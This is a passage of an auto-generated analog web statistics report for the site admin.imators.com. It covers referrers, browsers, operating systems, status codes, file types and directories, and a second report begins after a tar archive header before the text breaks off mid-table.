class="b"> 1.73%</td><td class="xl">37</td></tr> <tr><td class="R">1</td><td class="b"> 1.73%</td><td class="xl">104</td></tr> <tr><td class="R">1</td><td class="b"> 1.73%</td><td class="xl">140.248</td></tr> <tr><td class="R">3</td><td class="b"> 2.12%</td><td class="xl">[not listed: 3 organizations]</td></tr> </tbody></table> </div><div class="redirref"><h2><a name="redirref" id="redirref">Redirected Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Redirected Referrer Report | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./redirref.png" alt="" /></p> <p class="whatinc"> Listing referring URLs, sorted by the number of redirected requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">3</td><td class="xl"><a href="https://admin.imators.com/index.php">https://admin.imators.com/index.php</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://admin.imators.com/">https://admin.imators.com/</a></td></tr> </tbody></table> </div><div class="failref"><h2><a name="failref" id="failref">Failed Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | Failed Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./failref.png" alt="" /></p> <p class="whatinc"> Listing referring URLs, sorted by the number of failed requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">131</td><td class="xl"><a href="https://www.google.com/">https://www.google.com/</a></td></tr> <tr><td class="R">100</td><td class="xl"><a href="http://www.admin.imators.com/">http://www.admin.imators.com/</a></td></tr> <tr><td class="R">37</td><td class="xl"><a href="http://admin.imators.com/">http://admin.imators.com/</a></td></tr> <tr><td class="R">27</td><td class="xl"><a href="https://www.admin.imators.com/">https://www.admin.imators.com/</a></td></tr> <tr><td class="R">18</td><td class="xl"><a href="https://admin.imators.com/">https://admin.imators.com/</a></td></tr> <tr><td class="R">5</td><td class="xl"><a href="https://admin.imators.com/index.php">https://admin.imators.com/index.php</a></td></tr> <tr><td class="R">5</td><td class="xl"><a href="https://admin.imators.com/dashboard.php">https://admin.imators.com/dashboard.php</a></td></tr> <tr><td class="R">4</td><td class="xl"><a href="https://www.admin.imators.com/autant">https://www.admin.imators.com/autant</a></td></tr> <tr><td class="R">2</td><td class="xl"><a href="http://admin.imators.com/gemance.html">http://admin.imators.com/gemance.html</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://admin.imators.com/invoice.php">https://admin.imators.com/invoice.php</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://www.acc-group.com.my//wp-login.php">https://www.acc-group.com.my//wp-login.php</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://admin.imators.com/leee-articles-school/process.html">https://admin.imators.com/leee-articles-school/process.html</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="http://172.175.34.106/">http://172.175.34.106/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="http://103.26.142.189:2082/">http://103.26.142.189:2082/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://www.google.co.jp/">https://www.google.co.jp/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://54.206.37.203:123/">https://54.206.37.203:123/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://www.google.it/">https://www.google.it/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://timetool.adscads.com/">https://timetool.adscads.com/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://admin.imators.com/mail.php">https://admin.imators.com/mail.php</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://admin.imators.com/status.php">https://admin.imators.com/status.php</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://34.102.195.246/">https://34.102.195.246/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://admin.imators.com/editor.php">https://admin.imators.com/editor.php</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://a.sinsafinejewelry.online/">https://a.sinsafinejewelry.online/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://mdys.mdf031.icu/">https://mdys.mdf031.icu/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://182.123.79.49:8443/">https://182.123.79.49:8443/</a></td></tr> </tbody></table> </div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | Referring Site Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./refsite.png" alt="" /></p> <p class="whatinc"> Listing referring sites, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead> <tbody><tr><td class="R">24</td><td class="xl">https://admin.imators.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.admin.imators.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://admin.imators.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://www.admin.imators.com/</td></tr> </tbody></table> </div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browrep.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="R">6</td><td class="P">6</td><td class="xl">Go-http-client/1.1</td></tr> <tr><td class="R">6</td><td class="P">5</td><td class="xl">Mozilla/5.0 (iPhone; CPU iPhone OS 18_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1</td></tr> <tr><td class="R">10</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36</td></tr> <tr><td class="R">20</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15</td></tr> <tr><td class="R">50</td><td class="P">0</td><td class="xl">[not listed: 3 browsers]</td></tr> </tbody></table> </div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browsum.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">42</td><td class="P">17</td><td class="xl">Safari</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">34</td><td class="P">10</td><td class="xl"> Safari/537</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">6</td><td class="P">5</td><td class="xl"> Safari/604</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Safari/605</td></tr> <tr><td class="N">2</td><td class="R">6</td><td class="P">6</td><td class="xl">Go-http-client</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">6</td><td class="P">6</td><td class="xl"> Go-http-client/1</td></tr> <tr><td class="N"> </td><td class="R">48</td><td class="P">0</td><td class="xl">[not listed: 2 browsers]</td></tr> </tbody></table> </div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./os.png" alt="" /></p> <p class="whatinc"> Listing operating systems, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">30</td><td class="P">8</td><td class="xl">Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">30</td><td class="P">8</td><td class="xl"> Windows NT</td></tr> <tr><td class="N">2</td><td class="R">10</td><td class="P">7</td><td class="xl">Macintosh</td></tr> <tr><td class="N">3</td><td class="R">54</td><td class="P">6</td><td class="xl">OS unknown</td></tr> <tr><td class="N">4</td><td class="R">2</td><td class="P">2</td><td class="xl">Unix</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Linux</td></tr> </tbody></table> </div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./code.png" alt="" /></p> <p class="whatinc"> Listing status codes, sorted numerically.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead> <tbody><tr><td class="R">98</td><td class="xl">200 OK</td></tr> <tr><td class="R">6</td><td class="xl">302 Document found elsewhere</td></tr> <tr><td class="R">2853</td><td class="xl">401 Authentication required</td></tr> <tr><td class="R">151</td><td class="xl">403 Access forbidden</td></tr> <tr><td class="R">50</td><td class="xl">404 Document not found</td></tr> <tr><td class="R">3</td><td class="xl">500 Internal server error</td></tr> </tbody></table> </div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./size.png" alt="" /></p> <table> <thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">1</td><td class="b"> </td></tr> <tr><td class="x"> 1B- 10B</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 11B- 100B</td><td class="R">49</td><td class="b"> 8.74%</td></tr> <tr><td class="x"> 101B- 1kB</td><td class="R">40</td><td class="b">51.20%</td></tr> <tr><td class="x"> 1kB- 10kB</td><td class="R">8</td><td class="b">40.06%</td></tr> </tbody></table> </div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./type.png" alt="" /></p> <p class="whatinc"> Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead> <tbody><tr><td class="R">20</td><td class="b">37.82%</td><td class="xl">[directories]</td></tr> <tr><td class="R">2</td><td class="b">18.97%</td><td class="xl">.cgi [CGI scripts]</td></tr> <tr><td class="R">17</td><td class="b">17.84%</td><td class="xl">.php [PHP]</td></tr> <tr><td class="R">48</td><td class="b"> 8.63%</td><td class="xl">[no extension]</td></tr> <tr><td class="R">5</td><td class="b"> 6.25%</td><td class="xl">.html [Hypertext Markup Language]</td></tr> <tr><td class="R">2</td><td class="b"> 5.51%</td><td class="xl">.js [JavaScript code]</td></tr> <tr><td class="R">1</td><td class="b"> 2.62%</td><td class="xl">.css [Cascading Style Sheets]</td></tr> <tr><td class="R">3</td><td class="b"> 2.36%</td><td class="xl">.svg</td></tr> </tbody></table> </div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p> <p><img src="./dir.png" alt="" /></p> <p class="whatinc"> Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead> <tbody><tr><td class="R">37</td><td class="b">56.07%</td><td class="xl">[root directory]</td></tr> <tr><td class="R">2</td><td class="b">18.97%</td><td class="xl">/cgi-sys/</td></tr> <tr><td class="R">6</td><td class="b">10.49%</td><td class="xl">/_autoindex/</td></tr> <tr><td class="R">48</td><td class="b"> 8.63%</td><td class="xl">/.well-known/</td></tr> <tr><td class="R">5</td><td class="b"> 5.85%</td><td class="xl">/leee-articles-school/</td></tr> </tbody></table> </div><div class="req"><h2><a name="req" id="req">Request Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p> <p class="whatinc"> Listing files with at least 20 requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead> <tbody><tr><td class="R">98</td><td class="b">100%</td><td class="D">Aug/17/25 1:04 PM</td><td class="xl">[not listed: 39 files]</td></tr> </tbody></table> </div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 6.0</a>. <br /><span class="runtimetitle">Running time:</span> Less than 1 second. </p> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> </div> </body> </html> 3.html 0000644 00000110442 15114762035 0005602 0 ustar 00 <?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet href="#internalStyle" type="text/css"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Web Server Statistics for admin.imators.com</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta name="robots" content="noindex,nofollow" /> <meta name="generator" content="analog 6.0/Unix" /> <style type="text/css" id="internalStyle"> h2 { background-color: #A0C0F0; width: 98%; padding: 3px 6px; } table { text-align: right; margin-left: 30px; background-color: #D0E0F0; border-collapse: collapse; } th { border-bottom: 1px solid #404050; border-right: 1px dotted #606070; border-top: none; border-left: none; padding: 0px 5px 1px 5px; font-weight: bold; background-color: #A0C0F0; } td { padding: 0px 5px 1px 5px; border-right: 1px dotted #606070; border-left: none; border-bottom: none; border-top:none; } td.x { font-family: monospace; white-space: pre; } .xl { text-align: left; border-right: none; } .xr { text-align: right; border-right: none; } .bar { text-align: left; border-right: none; } tr.sub {background-color: #C0C0FF; font-style: italic; } .repdesc { font-style: italic; } .repspan { font-style: italic; } .goto { font-size: small; } .gensumtitle { font-weight: bold; } .gototitle { font-weight: bold; } .runtimetitle { font-weight: bold; } img { border-style: none; } a:link { color: blue; text-decoration: none; } a:visited { color: purple; text-decoration: none; } a:link:hover { text-decoration: underline; } a:visited:hover { text-decoration: underline; } a:link:active { color: red; text-decoration: underline; } a:visited:active { color: red; text-decoration: underline; } </style> </head> <body> <div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://admin.imators.com/">admin.imators.com</a></h1> <p class="analysisspan">Program started on Mon, Mar 31 2025 at 2:11 PM. <br />Analyzed requests from Fri, Jun 14 2024 at 8:01 PM to Mon, Mar 31 2025 at 1:36 PM (289.73 days).</p> </div> <div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="lastseven">Figures in parentheses refer to the 7-day period ending Mar 31 2025 at 2:11 PM.</p> <p class="gensumlines"> <span class="gensumtitle">Successful requests:</span> 84 (0) <br /><span class="gensumtitle">Successful requests for pages:</span> 25 (0) <br /><span class="gensumtitle">Failed requests:</span> 1,445 (4) <br /><span class="gensumtitle">Redirected requests:</span> 6 (0) <br /><span class="gensumtitle">Distinct files requested:</span> 37 (194) <br /><span class="gensumtitle">Distinct hosts served:</span> 36 (458) <br /><span class="gensumtitle">Data transferred:</span> 42.51 kilobytes (0 bytes) <br /><span class="gensumtitle">Average data transferred per day:</span> 150 bytes (0 bytes) </p> </div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Jun 2024</td><td class="R">26</td><td class="P">13</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Jul 2024</td><td class="R">4</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x">Aug 2024</td><td class="R">10</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x">Sep 2024</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">Oct 2024</td><td class="R">26</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">Nov 2024</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">Dec 2024</td><td class="R">7</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> </td><td class="R"> </td><td class="P"> </td><td class="bar"> </td></tr> <tr><td class="x">Jan 2025</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">Feb 2025</td><td class="R">7</td><td class="P">0</td><td class="bar"></td></tr> </tbody></table> <p class="busiesttime">Busiest month: Jun 2024 (13 requests for pages).</p> </div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Sun</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">Mon</td><td class="R">9</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">Tue</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">Wed</td><td class="R">8</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">Thu</td><td class="R">12</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">Fri</td><td class="R">48</td><td class="P">19</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Sat</td><td class="R">7</td><td class="P">0</td><td class="bar"></td></tr> </tbody></table> </div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 1</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 2</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 3</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 4</td><td class="R">2</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 5</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 6</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 7</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 8</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 9</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">10</td><td class="R">3</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x">11</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">12</td><td 